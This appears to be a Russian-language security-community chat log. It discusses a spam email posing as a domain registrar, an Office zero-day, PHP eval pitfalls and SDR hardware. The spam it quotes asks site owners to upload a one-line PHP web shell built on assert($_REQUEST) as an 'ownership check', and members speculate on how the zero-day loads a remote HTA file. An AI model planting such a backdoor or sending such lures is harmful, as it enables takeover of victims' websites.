
napster
11.04.2017
08:29:22
ачуметь. спасибо!

Vitaly
11.04.2017
08:29:51
https://haveibeenpwned.com/

Roman
11.04.2017
08:30:32
ему, кажись надо не только бинарное значение pwned/safe))))

Andrey
11.04.2017
09:04:08
Яки дивны спамеры, под регистратора косят:
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом medved.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a139lrkt12z778j4.php со следующим содержимым:
<?php
assert (stripslashes( $_REQUEST [R01]));
?>

Google

Andrey
11.04.2017
09:04:27
и спам от r01.tech

MERRON
11.04.2017
09:05:40
Журналист Bleeping Computer Каталин Кимпану обнаружил на одном из подпольных форумов информацию о сайте LeakedSource, который был заново запущен в доменной зоне .ru. На самом LeakedSource.ru указано, что данный веб-ресурс – это продолжение оригинальной версии.
По словам администраторов сайта, они сменили провайдера и регистратора доменных имен. В то же время была утрачена часть контента и потерян доступ к старым серверам и доменам.
Как утверждает Кимпану, LeakedSource.ru не является фишинговым и на самом деле дает доступ к утекшей информации.

User
11.04.2017
09:09:50
<?php
assert (stripslashes( $_REQUEST [R01]));
?>
а где здесь бекдор?
(сто лет не пиал на php)

Alex
11.04.2017
09:10:17
assert == eval

User
11.04.2017
09:10:45
ебанись, вообще не очевидно
во всех яп что я видел assert это assert -- проверяет условие и кидает исключение если false

MERRON
11.04.2017
09:11:49

User
11.04.2017
09:12:55
ну в питоне такое бай дизайн невозможно например

MERRON
11.04.2017
09:13:18
https://habrahabr.ru/post/138443/

Google

Andrey
11.04.2017
09:13:23
ща пособираем команды, чо они там в request слать будут

User
11.04.2017
09:13:56
в этом php-шном коде assert-у в кач-ве аргумента передается строка, интересно какой ебанат дизайнивший язык додумался ее eval-ить
по-хорошему та версия php которая идет в пакетной базе продакшн дистров вообще должна быть запатчена что бы там вообще не было возможности вызвать assert, eval или другое опасное говно

Alex
11.04.2017
09:18:23
Ну в питоне 2.x была подобная фича с raw_input()

Andrey
11.04.2017
09:18:23
»2. В production environment опция assert.active выключена и аргумент ассерта не вычисляется => злоумышленник ничего не получит.

MERRON
11.04.2017
09:20:03
http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html
http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html
1000 и 1 способ рце в пхп %)

User
11.04.2017
09:20:24
> @Qwerty100500
Ну в питоне 2.x была подобная фича с raw_input()
это не так страшно, raw_input подразумевает консольное приложение которое ты ручками запускаешь из командной строки, гипотетический сценарий rce здесь тяжело придумать
а в сферической вебной аппликухе в вакууме raw_input() никто использовать не будет потому что нафига он там

Alex
11.04.2017
09:22:46
Меня больше "радует" ключ /e в preg_replace

MERRON
11.04.2017
09:24:52
но да, это было "гениально"

Aleksandr
11.04.2017
09:32:39
Привет. посоветуйте. мн нужна крон такска, которая будет выполнять скрипт. при этом, с учетом того, что это деньги
1. возможно ли как-то усложнить возможность редактирования крона (как минимум отключение моей таски и добавление новой)
2. засекурить скрипт сам от модификации.
все это на случай компрометации и получения доступа к серверу. ну хотя бы от обычного пользователя, от рута не спастись в целом...

User
11.04.2017
09:34:24
/etc/crontab и так не доступен на редактирование юзеру
т.е. -- твоя просьба не имеет смысла потому что оно из коробки уже так
сделай своему скрипту chmod -w и наслаждайся

Aleksandr
11.04.2017
09:38:00
в целом логично... спасибо)

A
11.04.2017
09:42:11

Valentin
11.04.2017
09:47:34
Всем привет, есть тут те кто моторлки удачно перепаиваил и все зависимости правилтно ставил?
Совет нуден

shadowsoul
11.04.2017
09:48:02
вопрос херовый, переформулируй с моделью и задачей

Google

Valentin
11.04.2017
09:49:46
Моторолка с118 под осмоком, кто сталкивался с этим? Или может мануале на русском есть более подробные

witn3ss
11.04.2017
09:49:48
какая ирония

shadowsoul
11.04.2017
09:50:06

User
11.04.2017
09:50:26
а перепаивать их зачем?

witn3ss
11.04.2017
09:50:34

User
11.04.2017
09:50:38
фильтра, что-ли?

shadowsoul
11.04.2017
09:50:47
ага

Valentin
11.04.2017
09:51:06

witn3ss
11.04.2017
09:51:10
плюс в вики же просто все описано, хоть она и англоязычная

User
11.04.2017
09:51:31
дякую тобi б-же за blade-rd
* rf

witn3ss
11.04.2017
09:51:48

shadowsoul
11.04.2017
09:51:53
B200 на другом fpga, наконец-то открытая, радио то же самое, и по цене типа в 420 баксов

witn3ss
11.04.2017
09:52:37

User
11.04.2017
09:53:00
400 баксов не то что бы сильная экономия если сравнивать с лаймом и блейдом
лайм и так продается чуть ли не по себестоимости железа, сделать такого рода платки существенно дешевле мне кажется уже невозможно

shadowsoul
11.04.2017
09:53:42
лайм - пиздец, разные входы, crosstalk, совершенно непонятные уровни сигнала на передачу

User
11.04.2017
09:53:54
да, наслышан

shadowsoul
11.04.2017
09:53:56
блейд - увы, тоже есть проблемы

Google

shadowsoul
11.04.2017
09:54:10
с лаймом вот есть товарищ которого могу хоть завтра поймать

User
11.04.2017
09:59:42
а что там за проблемы кроме головняков с подключением более крутых часов и своего собственного драйвера (сейчас он, правда, уже всем чем только можно поддерживается)?
да и с часами проблема надуманная, во-первых не такие уж и головняки (хотя не так удобно как у B200, это да), во-вторых TCXO c подстройкой по GPS это в сущности блажь для образовательного/исследовательского использования

shadowsoul
11.04.2017
10:05:38
TCXO печки сами по себе нихера не дешевые
подстройка по gps решается в масштабе 60 баксов на всё

Admin
ERROR: S client not available

User
11.04.2017
10:06:09
и что самое главное -- для education/research purposes не особо нужные
штатные 1 pps часы для B200 стоят кстати чуть ли не в два раза дороже чем сам B200
ClockTamer стоит что-то в районе пару сотен кажется

shadowsoul
11.04.2017
10:09:18
ну так usrp постоянно оверпрайс трёхкратный)

yar1k
11.04.2017
12:37:52
К вопросу о 0-day в ms office word. Может ли это быть коммерческая активность ms? Т.е. не укладываются в планы по переводу людей(продаже) нового офиса и дают команду: "выпускайте кракена". К тому же, пролистав гугл не понял к какому релизу офиса относится уязвимость.

User
11.04.2017
12:38:46
большего бреда относительно 0дей уязвимостей где-либо я еще не слышал

Mikhail
11.04.2017
12:39:21
а PoC то есть? А то все пишут, но нихуя не показывают

User
11.04.2017
12:39:25
из того же разряда что и "ав компании сами пишут вирусы что бы их продукты покупали!"

yar1k
11.04.2017
12:40:06
Я люблю теории заговора и не люблю MS, так звезды сошлись

User
11.04.2017
12:41:47
> @cyberpunkych
а PoC то есть? А то все пишут, но нихуя не показывают
я не ванга, но насколько я понял уязвимость работает следующим образом
у тебя есть офисный документ который подтягивает HTA application с удаленного URL используя соответствующий функционал соответствующего COM/OLE объекта
HTA application делает всякое зло (потому что может) типа shell.run('calc.exe') и ворд при загрузке этого applicatioin-а показывает соответствующий диалог с предложением разрешить или заблокировать
но проблема в том, что в реальной жизни этот HTA application исполняется до того, как пользователь кликнет в этом диалоге что-либо
короче, как-то так

Google

Fuuss ?
11.04.2017
12:45:27
https://threatpost.ru/0-day_microsoft_office_pod_atakoj/21370/

Евгений
11.04.2017
12:45:30
раз и сразу пок) а поискать?

User
11.04.2017
12:45:45
это мое личное предположние исходя из обрывков инфы которую я встречал в тви
@metacat не, это другое совсем
вектора атак из той презы скорее всего не имеют отнощения к этой конкретной уязвимости

Евгений
11.04.2017
12:48:27
к этой конкретной нет, но думаю можно догадаться...

User
11.04.2017
12:48:41
догадаться что?
это вообще о другом
там описывается три класса багов: десериализация, verb action и dll hijacking в com/ole, не похоже что бы хотя бы один из этих классов имел отношение к этому новому 0дею
кстати, все эти три класса уязвимостей в com/ole были вытоптанны почти в ноль за 2013-2015 года

Vladusha
11.04.2017
12:52:16

User
11.04.2017
12:52:17
найти что-то похожее на них в тех компонентах которые шипит сам майкрософт сейчас почти нереально
я думаю что в этом новом эксплойте для загрузки HTA используется COM/OLE объект {3050F5C8-98B5-11CF-BB82-00AA00BDCE0B} и URL передается в него через интерфейс IPersistStream

Vladusha
11.04.2017
13:00:07
Сейчас все побегут тестить))
Но нет, не он